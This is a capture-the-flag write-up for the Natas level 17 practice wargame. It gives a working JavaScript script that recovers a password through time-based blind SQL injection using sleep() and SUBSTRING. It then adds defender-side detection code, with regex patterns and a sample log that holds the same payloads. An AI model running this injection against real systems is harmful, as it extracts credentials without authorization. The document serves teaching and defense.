Natas Level 17

[screenshot: natas level 17 msg]

Our username check is back, and this time it’s not telling us anything:

[screenshot: natas level 17 source]

It looks like they forgot to uncomment all the messages before they published this file, so the response no longer tells us whether a username exists.  That's ok: we can take the same strategy as the other blind SQL injection level, but instead of relying on an error message we use an if() statement combined with the sleep() function to tell us whether we have the correct character (a time-based blind injection).  In the code below, the database pauses for two seconds only when the guessed character is correct.  We time each request; if it takes longer than 2000 milliseconds (2 seconds), we know we have the right character and move on to the next index:

var start = new Date().getTime();
var end = new Date().getTime();
var string = "";   // password characters recovered so far
var query, xhr, i, j;
for (j = 1; j < 33; j++) {           // one iteration per password position (32 positions)
    for (i = 48; i < 123; i++) {     // candidate characters from '0' (48) to 'z' (122)
        if (i > 57 && i < 65) { continue; }  // skip the codes between '9' and 'A'
        if (i > 90 && i < 97) { continue; }  // skip the codes between 'Z' and 'a'
        query = 'username=natas18" and if(binary(SUBSTRING(password,' + j + ', 1)) = "' + String.fromCharCode(i) + '", sleep(2), 0) and "1" = "1';
        start = new Date().getTime();  // start timing
        xhr = new XMLHttpRequest();
        xhr.open("POST", "http://natas17.natas.labs.overthewire.org/index.php", false);  // synchronous, so the timer brackets the whole request
        xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        xhr.send(query);
        console.log(query);
        console.log(string);
        end = new Date().getTime();  // end timing
        if (end - start > 2000) {    // sleep(2) fired, so this character is correct
            console.log(String.fromCharCode(i));
            //console.log(xhr.response);
            string += String.fromCharCode(i);
            break;
        }
    }
}
console.log(string);

You may have to increase the sleep time (and the 2000 ms threshold with it) if your internet connection is slow, so that a slow normal response is not mistaken for a hit:

[screenshot: natas level 17 win]
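As an added example (not from the original writeup), here is what the same timing pattern looks like from the defender's side: detection logic over a constructed access log. The record fields ip, rt_ms and body, and the 1500 ms / 3-probe thresholds, are assumptions; the point is that most probes come back fast and only the hits are slow, so the repeated injection syntax per client is the better signal than any single slow request.

```javascript
// Added example, not part of the original writeup: defender-side detection for the
// timing pattern above. Assumed log record shape: { ip, rt_ms, body } (url-encoded POST body).
const SQLI_DELAY = /\b(sleep|benchmark|pg_sleep|waitfor)\s*\(/i;  // delay primitives
const SQLI_PROBE = /\b(substring|substr|mid|ascii)\s*\(/i;       // per-character probing

// Constructed sample: two normal logins, then one client probing the first two
// password characters; the 2031 ms line is the guess that triggered sleep(2).
const SAMPLE_LOG = [
  { ip: "10.0.0.5", rt_ms: 12,   body: "username=alice" },
  { ip: "10.0.0.6", rt_ms: 15,   body: "username=bob" },
  { ip: "10.0.0.9", rt_ms: 14,   body: 'username=natas18" and if(binary(SUBSTRING(password,1, 1)) = "a", sleep(2), 0) and "1" = "1' },
  { ip: "10.0.0.9", rt_ms: 2031, body: 'username=natas18" and if(binary(SUBSTRING(password,1, 1)) = "b", sleep(2), 0) and "1" = "1' },
  { ip: "10.0.0.9", rt_ms: 13,   body: 'username=natas18" and if(binary(SUBSTRING(password,2, 1)) = "a", sleep(2), 0) and "1" = "1' },
];

// Decode a url-encoded form body into { key: value }; undecodable values stay raw.
function parseBody(body) {
  const out = {};
  for (const pair of body.split("&")) {
    const [k, ...rest] = pair.split("=");
    const v = rest.join("=").replace(/\+/g, " ");
    try { out[k] = decodeURIComponent(v); } catch { out[k] = v; }
  }
  return out;
}

// Syntax reasons a single request looks like a blind SQL probe (empty = clean).
function inspect(entry) {
  const reasons = [];
  for (const [k, v] of Object.entries(parseBody(entry.body || ""))) {
    if (SQLI_DELAY.test(v)) reasons.push(`${k}: delay function`);
    if (SQLI_PROBE.test(v)) reasons.push(`${k}: substring probe`);
  }
  return reasons;
}

// Per-client aggregation: wrong guesses return fast and only hits are slow, so a lone
// slow request is weak evidence; repeated injection syntax from one client is the signal.
function detect(entries, { slowMs = 1500, minProbes = 3 } = {}) {
  const byIp = new Map();
  for (const e of entries) {
    if (inspect(e).length === 0) continue;
    const s = byIp.get(e.ip) || { ip: e.ip, probes: 0, slow: 0 };
    s.probes += 1;
    if (e.rt_ms >= slowMs) s.slow += 1;
    byIp.set(e.ip, s);
  }
  return [...byIp.values()].filter(s => s.probes >= minProbes);
}
```

Running detect(SAMPLE_LOG) flags only 10.0.0.9 with three probes, one of them slow; the two normal logins produce no reasons at all.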